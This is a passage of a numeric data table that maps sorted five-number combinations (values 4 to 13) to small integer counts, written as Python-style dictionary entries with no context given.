(4, 5, 5, 9, 10): 3,
(4, 5, 5, 9, 11): 7,
(4, 5, 5, 9, 12): 11,
(4, 5, 5, 9, 13): 3,
(4, 5, 5, 10, 10): 7,
(4, 5, 5, 10, 11): 4,
(4, 5, 5, 10, 12): 14,
(4, 5, 5, 10, 13): 9,
(4, 5, 5, 11, 11): 2,
(4, 5, 5, 11, 12): 7,
(4, 5, 5, 11, 13): 9,
(4, 5, 5, 12, 12): 1,
(4, 5, 5, 12, 13): 3,
(4, 5, 5, 13, 13): 2,
(4, 5, 6, 6, 6): 4,
(4, 5, 6, 6, 7): 13,
(4, 5, 6, 6, 8): 11,
(4, 5, 6, 6, 9): 22,
(4, 5, 6, 6, 10): 16,
(4, 5, 6, 6, 11): 5,
(4, 5, 6, 6, 12): 17,
(4, 5, 6, 6, 13): 6,
(4, 5, 6, 7, 7): 14,
(4, 5, 6, 7, 8): 20,
(4, 5, 6, 7, 9): 21,
(4, 5, 6, 7, 10): 21,
(4, 5, 6, 7, 11): 11,
(4, 5, 6, 7, 12): 12,
(4, 5, 6, 7, 13): 10,
(4, 5, 6, 8, 8): 16,
(4, 5, 6, 8, 9): 21,
(4, 5, 6, 8, 10): 31,
(4, 5, 6, 8, 11): 12,
(4, 5, 6, 8, 12): 34,
(4, 5, 6, 8, 13): 9,
(4, 5, 6, 9, 9): 7,
(4, 5, 6, 9, 10): 11,
(4, 5, 6, 9, 11): 12,
(4, 5, 6, 9, 12): 24,
(4, 5, 6, 9, 13): 18,
(4, 5, 6, 10, 10): 8,
(4, 5, 6, 10, 11): 12,
(4, 5, 6, 10, 12): 22,
(4, 5, 6, 10, 13): 19,
(4, 5, 6, 11, 11): 5,
(4, 5, 6, 11, 12): 14,
(4, 5, 6, 11, 13): 10,
(4, 5, 6, 12, 12): 12,
(4, 5, 6, 12, 13): 11,
(4, 5, 6, 13, 13): 5,
(4, 5, 7, 7, 7): 7,
(4, 5, 7, 7, 8): 12,
(4, 5, 7, 7, 9): 12,
(4, 5, 7, 7, 10): 10,
(4, 5, 7, 7, 11): 4,
(4, 5, 7, 7, 12): 11,
(4, 5, 7, 7, 13): 6,
(4, 5, 7, 8, 8): 3,
(4, 5, 7, 8, 9): 20,
(4, 5, 7, 8, 10): 10,
(4, 5, 7, 8, 11): 16,
(4, 5, 7, 8, 12): 12,
(4, 5, 7, 8, 13): 20,
(4, 5, 7, 9, 9): 4,
(4, 5, 7, 9, 10): 19,
(4, 5, 7, 9, 11): 8,
(4, 5, 7, 9, 12): 21,
(4, 5, 7, 9, 13): 5,
(4, 5, 7, 10, 10): 9,
(4, 5, 7, 10, 11): 15,
(4, 5, 7, 10, 12): 24,
(4, 5, 7, 10, 13): 8,
(4, 5, 7, 11, 11): 5,
(4, 5, 7, 11, 12): 10,
(4, 5, 7, 11, 13): 4,
(4, 5, 7, 12, 12): 3,
(4, 5, 7, 12, 13): 13,
(4, 5, 7, 13, 13): 5,
(4, 5, 8, 8, 8): 5,
(4, 5, 8, 8, 9): 5,
(4, 5, 8, 8, 10): 14,
(4, 5, 8, 8, 11): 1,
(4, 5, 8, 8, 12): 14,
(4, 5, 8, 8, 13): 2,
(4, 5, 8, 9, 9): 8,
(4, 5, 8, 9, 10): 19,
(4, 5, 8, 9, 11): 17,
(4, 5, 8, 9, 12): 8,
(4, 5, 8, 9, 13): 6,
(4, 5, 8, 10, 10): 12,
(4, 5, 8, 10, 11): 20,
(4, 5, 8, 10, 12): 24,
(4, 5, 8, 10, 13): 19,
(4, 5, 8, 11, 11): 10,
(4, 5, 8, 11, 12): 5,
(4, 5, 8, 11, 13): 13,
(4, 5, 8, 12, 12): 6,
(4, 5, 8, 12, 13): 10,
(4, 5, 8, 13, 13): 6,
(4, 5, 9, 9, 9): 3,
(4, 5, 9, 9, 10): 8,
(4, 5, 9, 9, 11): 6,
(4, 5, 9, 9, 12): 6,
(4, 5, 9, 10, 10): 10,
(4, 5, 9, 10, 11): 8,
(4, 5, 9, 10, 12): 18,
(4, 5, 9, 10, 13): 9,
(4, 5, 9, 11, 11): 7,
(4, 5, 9, 11, 12): 16,
(4, 5, 9, 11, 13): 11,
(4, 5, 9, 12, 12): 10,
(4, 5, 9, 12, 13): 13,
(4, 5, 9, 13, 13): 6,
(4, 5, 10, 10, 10): 6,
(4, 5, 10, 10, 11): 8,
(4, 5, 10, 10, 12): 16,
(4, 5, 10, 10, 13): 6,
(4, 5, 10, 11, 11): 6,
(4, 5, 10, 11, 12): 21,
(4, 5, 10, 11, 13): 10,
(4, 5, 10, 12, 12): 13,
(4, 5, 10, 12, 13): 10,
(4, 5, 10, 13, 13): 4,
(4, 5, 11, 11, 11): 3,
(4, 5, 11, 11, 12): 6,
(4, 5, 11, 11, 13): 3,
(4, 5, 11, 12, 12): 4,
(4, 5, 11, 12, 13): 8,
(4, 5, 11, 13, 13): 5,
(4, 5, 12, 12, 12): 4,
(4, 5, 12, 12, 13): 5,
(4, 5, 12, 13, 13): 2,
(4, 6, 6, 6, 6): 2,
(4, 6, 6, 6, 7): 5,
(4, 6, 6, 6, 8): 13,
(4, 6, 6, 6, 9): 8,
(4, 6, 6, 6, 10): 10,
(4, 6, 6, 6, 11): 5,
(4, 6, 6, 6, 12): 15,
(4, 6, 6, 6, 13): 3,
(4, 6, 6, 7, 7): 5,
(4, 6, 6, 7, 8): 7,
(4, 6, 6, 7, 9): 19,
(4, 6, 6, 7, 10): 8,
(4, 6, 6, 7, 11): 12,
(4, 6, 6, 7, 12): 13,
(4, 6, 6, 7, 13): 6,
(4, 6, 6, 8, 8): 6,
(4, 6, 6, 8, 9): 23,
(4, 6, 6, 8, 10): 20,
(4, 6, 6, 8, 11): 11,
(4, 6, 6, 8, 12): 19,
(4, 6, 6, 8, 13): 7,
(4, 6, 6, 9, 9): 8,
(4, 6, 6, 9, 10): 18,
(4, 6, 6, 9, 11): 11,
(4, 6, 6, 9, 12): 23,
(4, 6, 6, 9, 13): 7,
(4, 6, 6, 10, 10): 3,
(4, 6, 6, 10, 11): 4,
(4, 6, 6, 10, 12): 27,
(4, 6, 6, 10, 13): 9,
(4, 6, 6, 11, 11): 2,
(4, 6, 6, 11, 12): 12,
(4, 6, 6, 11, 13): 11,
(4, 6, 6, 12, 12): 13,
(4, 6, 6, 12, 13): 11,
(4, 6, 6, 13, 13): 2,
(4, 6, 7, 7, 7): 4,
(4, 6, 7, 7, 8): 15,
(4, 6, 7, 7, 9): 6,
(4, 6, 7, 7, 10): 13,
(4, 6, 7, 7, 11): 5,
(4, 6, 7, 7, 12): 17,
(4, 6, 7, 7, 13): 6,
(4, 6, 7, 8, 8): 14,
(4, 6, 7, 8, 9): 11,
(4, 6, 7, 8, 10): 24,
(4, 6, 7, 8, 11): 19,
(4, 6, 7, 8, 12): 28,
(4, 6, 7, 8, 13): 15,
(4, 6, 7, 9, 9): 12,
(4, 6, 7, 9, 10): 14,
(4, 6, 7, 9, 11): 18,
(4, 6, 7, 9, 12): 26,
(4, 6, 7, 9, 13): 11,
(4, 6, 7, 10, 10): 12,
(4, 6, 7, 10, 11): 15,
(4, 6, 7, 10, 12): 15,
(4, 6, 7, 10, 13): 14,
(4, 6, 7, 11, 11): 6,
(4, 6, 7, 11, 12): 13,
(4, 6, 7, 11, 13): 17,
(4, 6, 7, 12, 12): 26,
(4, 6, 7, 12, 13): 11,
(4, 6, 7, 13, 13): 2,
(4, 6, 8, 8, 8): 5,
(4, 6, 8, 8, 9): 12,
(4, 6, 8, 8, 10): 15,
(4, 6, 8, 8, 11): 14,
(4, 6, 8, 8, 12): 17,
(4, 6, 8, 8, 13): 15,
(4, 6, 8, 9, 9): 15,
(4, 6, 8, 9, 10): 20,
(4, 6, 8, 9, 11): 12,
(4, 6, 8, 9, 12): 39,
(4, 6, 8, 9, 13): 6,
(4, 6, 8, 10, 10): 20,
(4, 6, 8, 10, 11): 22,
(4, 6, 8, 10, 12): 23,
(4, 6, 8, 10, 13): 17,
(4, 6, 8, 11, 11): 5,
(4, 6, 8, 11, 12): 25,
(4, 6, 8, 11, 13): 11,
(4, 6, 8, 12, 12): 31,
(4, 6, 8, 12, 13): 22,
(4, 6, 8, 13, 13): 6,
(4, 6, 9, 9, 9): 5,
(4, 6, 9, 9, 10): 14,
(4, 6, 9, 9, 11): 7,
(4, 6, 9, 9, 12): 18,
(4, 6, 9, 9, 13): 10,
(4, 6, 9, 10, 10): 7,
(4, 6, 9, 10, 11): 7,
(4, 6, 9, 10, 12): 31,
(4, 6, 9, 10, 13): 14,
(4, 6, 9, 11, 11): 6,
(4, 6, 9, 11, 12): 19,
(4, 6, 9, 11, 13): 16,
(4, 6, 9, 12, 12): 26,
(4, 6, 9, 12, 13): 12,
(4, 6, 9, 13, 13): 5,
(4, 6, 10, 10, 10): 3,
(4, 6, 10, 10, 11): 9,
(4, 6, 10, 10, 12): 20,
(4, 6, 10, 10, 13): 9,
(4, 6, 10, 11, 11): 12,
(4, 6, 10, 11, 12): 17,
(4, 6, 10, 11, 13): 8,
(4, 6, 10, 12, 12): 13,
(4, 6, 10, 12, 13): 14,
(4, 6, 10, 13, 13): 5,
(4, 6, 11, 11, 11): 3,
(4, 6, 11, 11, 12): 7,
(4, 6, 11, 11, 13): 3,
(4, 6, 11, 12, 12): 11,
(4, 6, 11, 12, 13): 6,
(4, 6, 11, 13, 13): 7,
(4, 6, 12, 12, 12): 11,
(4, 6, 12, 12, 13): 16,
(4, 6, 12, 13, 13): 6,
(4, 6, 13, 13, 13): 1,
(4, 7, 7, 7, 7): 2,
(4, 7, 7, 7, 8): 6,
(4, 7, 7, 7, 9): 8,
(4, 7, 7, 7, 10): 8,
(4, 7, 7, 7, 11): 6,
(4, 7, 7, 7, 12): 5,
(4, 7, 7, 7, 13): 3,
(4, 7, 7, 8, 8): 5,
(4, 7, 7, 8, 9): 12,
(4, 7, 7, 8, 10): 14,
(4, 7, 7, 8, 11): 12,
(4, 7, 7, 8, 12): 6,
(4, 7, 7, 8, 13): 5,
(4, 7, 7, 9, 9): 4,
(4, 7, 7, 9, 10): 8,
(4, 7, 7, 9, 11): 7,
(4, 7, 7, 9, 12): 13,
(4, 7, 7, 9, 13): 4,
(4, 7, 7, 10, 10): 4,
(4, 7, 7, 10, 11): 10,
(4, 7, 7, 10, 12): 16,
(4, 7, 7, 10, 13): 9,
(4, 7, 7, 11, 11): 3,
(4, 7, 7, 11, 12): 8,
(4, 7, 7, 11, 13): 11,
(4, 7, 7, 12, 12): 4,
(4, 7, 7, 12, 13): 8,
(4, 7, 7, 13, 13): 3,
(4, 7, 8, 8, 8): 4,
(4, 7, 8, 8, 9): 5,
(4, 7, 8, 8, 10): 16,
(4, 7, 8, 8, 11): 6,
(4, 7, 8, 8, 12): 11,
(4, 7, 8, 8, 13): 4,
(4, 7, 8, 9, 9): 10,
(4, 7, 8, 9, 10): 17,
(4, 7, 8, 9, 11): 15,
(4, 7, 8, 9, 12): 9,
(4, 7, 8, 9, 13): 14,
(4, 7, 8, 10, 10): 6,
(4, 7, 8, 10, 11): 8,
(4, 7, 8, 10, 12): 28,
(4, 7, 8, 10, 13): 13,
(4, 7, 8, 11, 11): 7,
(4, 7, 8, 11, 12): 9,
(4, 7, 8, 11, 13): 15,
(4, 7, 8, 12, 12): 6,
(4, 7, 8, 12, 13): 5,
(4, 7, 8, 13, 13): 6,
(4, 7, 9, 9, 9): 3,
(4, 7, 9, 9, 10): 6,
(4, 7, 9, 9, 11): 4,
(4, 7, 9, 9, 12): 9,
(4, 7, 9, 9, 13): 10,
(4, 7, 9, 10, 10): 6,
(4, 7, 9, 10, 11): 15,
(4, 7, 9, 10, 12): 13,
(4, 7, 9, 10, 13): 11,
(4, 7, 9, 11, 11): 9,
(4, 7, 9, 11, 12): 18,
(4, 7, 9, 11, 13): 2,
(4, 7, 9, 12, 12): 9,
(4, 7, 9, 12, 13): 16,
(4, 7, 9, 13, 13): 4,
(4, 7, 10, 10, 10): 5,
(4, 7, 10, 10, 11): 9,
(4, 7, 10, 10, 12): 6,
(4, 7, 10, 10, 13): 6,
(4, 7, 10, 11, 11): 4,
(4, 7, 10, 11, 12): 14,
(4, 7, 10, 11, 13): 12,
(4, 7, 10, 12, 12): 14,
(4, 7, 10, 12, 13): 14,
(4, 7, 10, 13, 13): 7,
(4, 7, 11, 11, 11): 3,
(4, 7, 11, 11, 12): 4,
(4, 7, 11, 11, 13): 2,
(4, 7, 11, 12, 12): 5,
(4, 7, 11, 12, 13): 12,
(4, 7, 11, 13, 13): 4,
(4, 7, 12, 12, 12): 3,
(4, 7, 12, 12, 13): 5,
(4, 7, 12, 13, 13): 5,
(4, 7, 13, 13, 13): 4,
(4, 8, 8, 8, 9): 2,
(4, 8, 8, 8, 10): 9,
(4, 8, 8, 8, 11): 7,
(4, 8, 8, 8, 12): 3,
(4, 8, 8, 8, 13): 4,
(4, 8, 8, 9, 9): 2,
(4, 8, 8, 9, 10): 7,
(4, 8, 8, 9, 11): 6,
(4, 8, 8, 9, 12): 8,
(4, 8, 8, 9, 13): 4,
(4, 8, 8, 10, 10): 5,
(4, 8, 8, 10, 11): 11,
(4, 8, 8, 10, 12): 19,
(4, 8, 8, 10, 13): 8,
(4, 8, 8, 11, 11): 3,
(4, 8, 8, 11, 12): 8,
(4, 8, 8, 11, 13): 3,
(4, 8, 8, 12, 12): 6,
(4, 8, 8, 12, 13): 4,
(4, 8, 8, 13, 13): 3,
(4, 8, 9, 9, 9): 1,
(4, 8, 9, 9, 10): 3,
(4, 8, 9, 9, 11): 7,
(4, 8, 9, 9, 12): 8,
(4, 8, 9, 9, 13): 1,
(4, 8, 9, 10, 10): 13,
(4, 8, 9, 10, 11): 14,
(4, 8, 9, 10, 12): 26,
(4, 8, 9, 10, 13): 10,
(4, 8, 9, 11, 11): 8,
(4, 8, 9, 11, 12): 5,
(4, 8, 9, 11, 13): 18,
(4, 8, 9, 12, 12): 12,
(4, 8, 9, 12, 13): 11,
(4, 8, 9, 13, 13): 5,
(4, 8, 10, 10, 10): 6,
(4, 8, 10, 10, 11): 8,
(4, 8, 10, 10, 12): 9,
(4, 8, 10, 10, 13): 7,
(4, 8, 10, 11, 11): 5,
(4, 8, 10, 11, 12): 17,
(4, 8, 10, 11, 13): 8,
(4, 8, 10, 12, 12): 16,
(4, 8, 10, 12, 13): 23,
(4, 8, 10, 13, 13): 5,
(4, 8, 11, 11, 11): 1,
(4, 8, 11, 11, 12): 6,
(4, 8, 11, 11, 13): 7,
(4, 8, 11, 12, 12): 1,
(4, 8, 11, 12, 13): 8,
(4, 8, 11, 13, 13): 6,
(4, 8, 12, 12, 12): 3,
(4, 8, 12, 12, 13): 1,
(4, 8, 12, 13, 13): 3,
(4, 9, 9, 9, 10): 3,
(4, 9, 9, 9, 11): 4,
(4, 9, 9, 9, 12): 9,
(4, 9, 9, 9, 13): 1,
(4, 9, 9, 10, 10): 3,
(4, 9, 9, 10, 11): 3,
(4, 9, 9, 10, 12): 8,
(4, 9, 9, 10, 13): 6,
(4, 9, 9, 11, 12): 10,
(4, 9, 9, 11, 13): 2,
(4, 9, 9, 12, 12): 5,
(4, 9, 9, 12, 13): 6,
(4, 9, 9, 13, 13): 2,
(4, 9, 10, 10, 10): 1,
(4, 9, 10, 10, 11): 6,
(4, 9, 10, 10, 12): 7,
(4, 9, 10, 10, 13): 3,
(4, 9, 10, 11, 11): 8,
(4, 9, 10, 11, 12): 6,
(4, 9, 10, 11, 13): 10,
(4, 9, 10, 12, 12): 13,
(4, 9, 10, 12, 13): 8,
(4, 9, 10, 13, 13): 8,
(4, 9, 11, 11, 11): 2,
(4, 9, 11, 11, 12): 6,
(4, 9, 11, 11, 13): 6,
(4, 9, 11, 12, 12): 6,
(4, 9, 11, 12, 13): 12,
(4, 9, 11, 13, 13): 2,
(4, 9, 12, 12, 12): 3,
(4, 9, 12, 12, 13): 4,
(4, 9, 12, 13, 13): 2,
(4, 9, 13, 13, 13): 2,
(4, 10, 10, 10, 10): 2,
(4, 10, 10, 10, 11): 2,
(4, 10, 10, 10, 12): 6,
(4, 10, 10, 10, 13): 2,
(4, 10, 10, 11, 12): 9,
(4, 10, 10, 11, 13): 6,
(4, 10, 10, 12, 12): 2,
(4, 10, 10, 12, 13): 7,
(4, 10, 10, 13, 13): 3,
(4, 10, 11, 11, 11): 2,
(4, 10, 11, 11, 12): 6,
(4, 10, 11, 11, 13): 7,
(4, 10, 11, 12, 12): 8,
(4, 10, 11, 12, 13): 10,
(4, 10, 11, 13, 13): 3,
(4, 10, 12, 12, 12): 8,
(4, 10, 12, 12, 13): 6,
(4, 10, 12, 13, 13): 8,
(4, 10, 13, 13, 13): 3,
(4, 11, 11, 11, 11): 2,
(4, 11, 11, 11, 12): 1,
(4, 11, 11, 11, 13): 3,
(4, 11, 11, 12, 12): 1,
(4, 11, 11, 12, 13): 8,
(4, 11, 11, 13, 13): 1,
(4, 11, 12, 12, 12): 3,
(4, 11, 12, 12, 13): 6,
(4, 11, 12, 13, 13): 6,
(4, 11, 13, 13, 13): 4,
(4, 12, 12, 12, 12): 2,
(4, 12, 12, 12, 13): 1,
(4, 12, 12, 13, 13): 3,
(4, 12, 13, 13, 13): 4,
(4, 13, 13, 13, 13): 1,
(5, 5, 5, 5, 6): 1,
(5, 5, 5, 5, 7): 2,
(5, 5, 5, 5, 8): 2,
(5, 5, 5, 5, 12): 2,
(5, 5, 5, 5, 13): 1,
(5, 5, 5, 6, 6): 4,
(5, 5, 5, 6, 7): 5,
(5, 5, 5, 6, 8): 5,
(5, 5, 5, 6, 9): 4,
(5, 5, 5, 6, 10): 1,
(5, 5, 5, 6, 11): 4,
(5, 5, 5, 6, 12): 4,
(5, 5, 5, 6, 13): 6,
(5, 5, 5, 7, 7): 2,
(5, 5, 5, 7, 8): 4,
(5, 5, 5, 7, 9): 3,
(5, 5, 5, 7, 10): 5,
(5, 5, 5, 7, 11): 3,
(5, 5, 5, 7, 12): 6,
(5, 5, 5, 7, 13): 2,
(5, 5, 5, 8, 8): 1,
(5, 5, 5, 8, 9): 4,
(5, 5, 5, 8, 10): 6,
(5, 5, 5, 8, 11): 3,
(5, 5, 5, 8, 12): 3,
(5, 5, 5, 8, 13): 2,
(5, 5, 5, 9, 10): 7,
(5, 5, 5, 9, 12): 2,
(5, 5, 5, 9, 13): 4,
(5, 5, 5, 10, 11): 4,
(5, 5, 5, 10, 12): 2,
(5, 5, 5, 10, 13): 3,
(5, 5, 5, 11, 11): 1,
(5, 5, 5, 11, 12): 2,
(5, 5, 5, 11, 13): 1,
(5, 5, 5, 12, 12): 1,
(5, 5, 5, 12, 13): 1,
(5, 5, 5, 13, 13): 1,
(5, 5, 6, 6, 6): 2,
(5, 5, 6, 6, 7): 9,
(5, 5, 6, 6, 8): 2,
(5, 5, 6, 6, 9): 3,
(5, 5, 6, 6, 10): 3,
(5, 5, 6, 6, 11): 4,
(5, 5, 6, 6, 12): 11,
(5, 5, 6, 6, 13): 3,
(5, 5, 6, 7, 7): 3,
(5, 5, 6, 7, 8): 9,
(5, 5, 6, 7, 9): 9,
(5, 5, 6, 7, 10): 8,
(5, 5, 6, 7, 11): 10,
(5, 5, 6, 7, 12): 14,
(5, 5, 6, 7, 13): 9,
(5, 5, 6, 8, 8): 4,
(5, 5, 6, 8, 9): 10,
(5, 5, 6, 8, 10): 14,
(5, 5, 6, 8, 11): 7,
(5, 5, 6, 8, 12): 6,
(5, 5, 6, 8, 13): 5,
(5, 5, 6, 9, 9): 6,
(5, 5, 6, 9, 10): 7,
(5, 5, 6, 9, 11): 3,
(5, 5, 6, 9, 12): 7,
(5, 5, 6, 9, 13): 10,
(5, 5, 6, 10, 10): 8,
(5, 5, 6, 10, 11): 1,
(5, 5, 6, 10, 12): 8,
(5, 5, 6, 10, 13): 8,
(5, 5, 6, 11, 11): 2,
(5, 5, 6, 11, 12): 8,
(5, 5, 6, 11, 13): 7,
(5, 5, 6, 12, 12): 4,
(5, 5, 6, 12, 13): 8,
(5, 5, 6, 13, 13): 1,
(5, 5, 7, 7, 7): 3,
(5, 5, 7, 7, 8): 3,
(5, 5, 7, 7, 9): 4,
(5, 5, 7, 7, 10): 8,
(5, 5, 7, 7, 11): 3,
(5, 5, 7, 7, 12): 5,
(5, 5, 7, 7, 13): 3,
(5, 5, 7, 8, 8): 4,
(5, 5, 7, 8, 9): 8,
(5, 5, 7, 8, 10): 8,
(5, 5, 7, 8, 11): 5,
(5, 5, 7, 8, 12): 10,
(5, 5, 7, 8, 13): 6,
(5, 5, 7, 9, 9): 4,
(5, 5, 7, 9, 10): 10,
(5, 5, 7, 9, 11): 8,
(5, 5, 7, 9, 12): 3,
(5, 5, 7, 9, 13): 4,
(5, 5, 7, 10, 10): 2,
(5, 5, 7, 10, 11): 6,
(5, 5, 7, 10, 12): 9,
(5, 5, 7, 10, 13): 4,
(5, 5, 7, 11, 11): 1,
(5, 5, 7, 11, 12): 3,
(5, 5, 7, 11, 13): 6,
(5, 5, 7, 12, 12): 7,
(5, 5, 7, 12, 13): 4,
(5, 5, 7, 13, 13): 2,
(5, 5, 8, 8, 9): 1,
(5, 5, 8, 8, 10): 5,
(5, 5, 8, 8, 11): 3,
(5, 5, 8, 8, 12): 6,
(5, 5, 8, 8, 13): 6,
(5, 5, 8, 9, 9): 3,
(5, 5, 8, 9, 10): 8,
(5, 5, 8, 9, 11): 5,
(5, 5, 8, 9, 12): 6,
(5, 5, 8, 9, 13): 2,
(5, 5, 8, 10, 10): 5,
(5, 5, 8, 10, 11): 6,
(5, 5, 8, 10, 12): 9,
(5, 5, 8, 10, 13): 7,
(5, 5, 8, 11, 11): 4,
(5, 5, 8, 11, 12): 4,
(5, 5, 8, 11, 13): 6,
(5, 5, 8, 12, 12): 1,
(5, 5, 8, 12, 13): 5,
(5, 5, 9, 9, 10): 1,
(5, 5, 9, 9, 11): 4,
(5, 5, 9, 9, 12): 7,
(5, 5, 9, 9, 13): 2,
(5, 5, 9, 10, 10): 3,
(5, 5, 9, 10, 11): 7,
(5, 5, 9, 10, 12): 9,
(5, 5, 9, 10, 13): 5,
(5, 5, 9, 11, 11): 3,
(5, 5, 9, 11, 12): 5,
(5, 5, 9, 11, 13): 4,
(5, 5, 9, 12, 12): 2,
(5, 5, 9, 12, 13): 1,
(5, 5, 9, 13, 13): 2,
(5, 5, 10, 10, 10): 1,
(5, 5, 10, 10, 11): 3,
(5, 5, 10, 10, 12): 8,
(5, 5, 10, 10, 13): 3,
(5, 5, 10, 11, 11): 2,
(5, 5, 10, 11, 12): 7,
(5, 5, 10, 11, 13): 5,
(5, 5, 10, 12, 12): 3,
(5, 5, 10, 12, 13): 6,
(5, 5, 10, 13, 13): 3,
(5, 5, 11, 11, 12): 2,
(5, 5, 11, 11, 13): 2,
(5, 5, 11, 12, 12): 3,
(5, 5, 11, 12, 13): 4,
(5, 5, 11, 13, 13): 1,
(5, 5, 12, 12, 12): 2,
(5, 5, 12, 12, 13): 4,
(5, 5, 12, 13, 13): 2,
(5, 6, 6, 6, 6): 4,
(5, 6, 6, 6, 7): 12,
(5, 6, 6, 6, 8): 6,
(5, 6, 6, 6, 9): 5,
(5, 6, 6, 6, 10): 4,
(5, 6, 6, 6, 11): 4,
(5, 6, 6, 6, 12): 7,
(5, 6, 6, 6, 13): 4,
(5, 6, 6, 7, 7): 13,
(5, 6, 6, 7, 8): 9,
(5, 6, 6, 7, 9): 8,
(5, 6, 6, 7, 10): 11,
(5, 6, 6, 7, 11): 5,
(5, 6, 6, 7, 12): 14,
(5, 6, 6, 7, 13): 7,
(5, 6, 6, 8, 8): 3,
(5, 6, 6, 8, 9): 16,
(5, 6, 6, 8, 10): 17,
(5, 6, 6, 8, 11): 8,
(5, 6, 6, 8, 12): 11,
(5, 6, 6, 8, 13): 7,
(5, 6, 6, 9, 9): 8,
(5, 6, 6, 9, 10): 11,
(5, 6, 6, 9, 11): 5,
(5, 6, 6, 9, 12): 17,
(5, 6, 6, 9, 13): 4,
(5, 6, 6, 10, 10): 4,
(5, 6, 6, 10, 11): 4,
(5, 6, 6, 10, 12): 16,
(5, 6, 6, 10, 13): 9,
(5, 6, 6, 11, 11): 3,
(5, 6, 6, 11, 12): 12,
(5, 6, 6, 11, 13): 8,
(5, 6, 6, 12, 12): 10,
(5, 6, 6, 12, 13): 8,
(5, 6, 6, 13, 13): 5,
(5, 6, 7, 7, 7): 9,
(5, 6, 7, 7, 8): 11,
(5, 6, 7, 7, 9): 6,
(5, 6, 7, 7, 10): 6,
(5, 6, 7, 7, 11): 11,
(5, 6, 7, 7, 12): 10,
(5, 6, 7, 7, 13): 9,
(5, 6, 7, 8, 8): 11,
(5, 6, 7, 8, 9): 16,
(5, 6, 7, 8, 10): 9,
(5, 6, 7, 8, 11): 12,
(5, 6, 7, 8, 12): 14,
(5, 6, 7, 8, 13): 10,
(5, 6, 7, 9, 9): 17,
(5, 6, 7, 9, 10): 21,
(5, 6, 7, 9, 11): 9,
(5, 6, 7, 9, 12): 19,
(5, 6, 7, 9, 13): 7,
(5, 6, 7, 10, 10): 9,
(5, 6, 7, 10, 11): 11,
(5, 6, 7, 10, 12): 13,
(5, 6, 7, 10, 13): 14,
(5, 6, 7, 11, 11): 6,
(5, 6, 7, 11, 12): 17,
(5, 6, 7, 11, 13): 15,
(5, 6, 7, 12, 12): 15,
(5, 6, 7, 12, 13): 18,
(5, 6, 7, 13, 13): 7,
(5, 6, 8, 8, 8): 7,
(5, 6, 8, 8, 9): 5,
(5, 6, 8, 8, 10): 10,
(5, 6, 8, 8, 11): 9,
(5, 6, 8, 8, 12): 14,
(5, 6, 8, 8, 13): 5,
(5, 6, 8, 9, 9): 9,
(5, 6, 8, 9, 10): 19,
(5, 6, 8, 9, 11): 20,
(5, 6, 8, 9, 12): 17,
(5, 6, 8, 9, 13): 15,
(5, 6, 8, 10, 10): 12,
(5, 6, 8, 10, 11): 12,
(5, 6, 8, 10, 12): 15,
(5, 6, 8, 10, 13): 11,
(5, 6, 8, 11, 11): 6,
(5, 6, 8, 11, 12): 10,
(5, 6, 8, 11, 13): 7,
(5, 6, 8, 12, 12): 19,
(5, 6, 8, 12, 13): 10,
(5, 6, 8, 13, 13): 6,
(5, 6, 9, 9, 9): 12,
(5, 6, 9, 9, 10): 6,
(5, 6, 9, 9, 11): 9,
(5, 6, 9, 9, 12): 11,
(5, 6, 9, 9, 13): 8,
(5, 6, 9, 10, 10): 8,
(5, 6, 9, 10, 11): 14,
(5, 6, 9, 10, 12): 31,
(5, 6, 9, 10, 13): 12,
(5, 6, 9, 11, 11): 4,
(5, 6, 9, 11, 12): 15,
(5, 6, 9, 11, 13): 8,
(5, 6, 9, 12, 12): 8,
(5, 6, 9, 12, 13): 12,
(5, 6, 9, 13, 13): 4,
(5, 6, 10, 10, 10): 5,
(5, 6, 10, 10, 11): 9,
(5, 6, 10, 10, 12): 10,
(5, 6, 10, 10, 13): 10,
(5, 6, 10, 11, 11): 4,
(5, 6, 10, 11, 12): 12,
(5, 6, 10, 11, 13): 10,
(5, 6, 10, 12, 12): 12,
(5, 6, 10, 12, 13): 8,
(5, 6, 10, 13, 13): 1,
(5, 6, 11, 11, 11): 4,
(5, 6, 11, 11, 12): 6,
(5, 6, 11, 11, 13): 7,
(5, 6, 11, 12, 12): 10,
(5, 6, 11, 12, 13): 13,
(5, 6, 11, 13, 13): 6,
(5, 6, 12, 12, 12): 7,
(5, 6, 12, 12, 13): 12,
(5, 6, 12, 13, 13): 6,
(5, 6, 13, 13, 13): 5,
(5, 7, 7, 7, 7): 2,
(5, 7, 7, 7, 8): 6,
(5, 7, 7, 7, 9): 6,
(5, 7, 7, 7, 10): 8,
(5, 7, 7, 7, 11): 3,
(5, 7, 7, 7, 12): 8,
(5, 7, 7, 7, 13): 3,
(5, 7, 7, 8, 8): 1,
(5, 7, 7, 8, 9): 9,
(5, 7, 7, 8, 10): 14,
(5, 7, 7, 8, 11): 6,
(5, 7, 7, 8, 12): 11,
(5, 7, 7, 8, 13): 5,
(5, 7, 7, 9, 9): 4,
(5, 7, 7, 9, 10): 6,
(5, 7, 7, 9, 11): 8,
(5, 7, 7, 9, 12): 5,
(5, 7, 7, 9, 13): 5,
(5, 7, 7, 10, 10): 3,
(5, 7, 7, 10, 11): 5,
(5, 7, 7, 10, 12): 8,
(5, 7, 7, 10, 13): 8,
(5, 7, 7, 11, 11): 3,
(5, 7, 7, 11, 12): 6,
(5, 7, 7, 11, 13): 7,
(5, 7, 7, 12, 12): 6,
(5, 7, 7, 12, 13): 5,
(5, 7, 7, 13, 13): 1,
(5, 7, 8, 8, 8): 3,
(5, 7, 8, 8, 9): 11,
(5, 7, 8, 8, 10): 9,
(5, 7, 8, 8, 11): 7,
(5, 7, 8, 8, 12): 4,
(5, 7, 8, 8, 13): 8,
(5, 7, 8, 9, 9): 5,
(5, 7, 8, 9, 10): 11,
(5, 7, 8, 9, 11): 5,
(5, 7, 8, 9, 12): 17,
(5, 7, 8, 9, 13): 10,
(5, 7, 8, 10, 10): 9,
(5, 7, 8, 10, 11): 10,
(5, 7, 8, 10, 12): 23,
(5, 7, 8, 10, 13): 13,
(5, 7, 8, 11, 11): 5,
(5, 7, 8, 11, 12): 11,
(5, 7, 8, 11, 13): 6,
(5, 7, 8, 12, 12): 5,
(5, 7, 8, 12, 13): 8,
(5, 7, 8, 13, 13): 3,
(5, 7, 9, 9, 9): 1,
(5, 7, 9, 9, 10): 6,
(5, 7, 9, 9, 11): 6,
(5, 7, 9, 9, 12): 15,
(5, 7, 9, 9, 13): 5,
(5, 7, 9, 10, 10): 10,
(5, 7, 9, 10, 11): 15,
(5, 7, 9, 10, 12): 14,
(5, 7, 9, 10, 13): 10,
(5, 7, 9, 11, 11): 3,
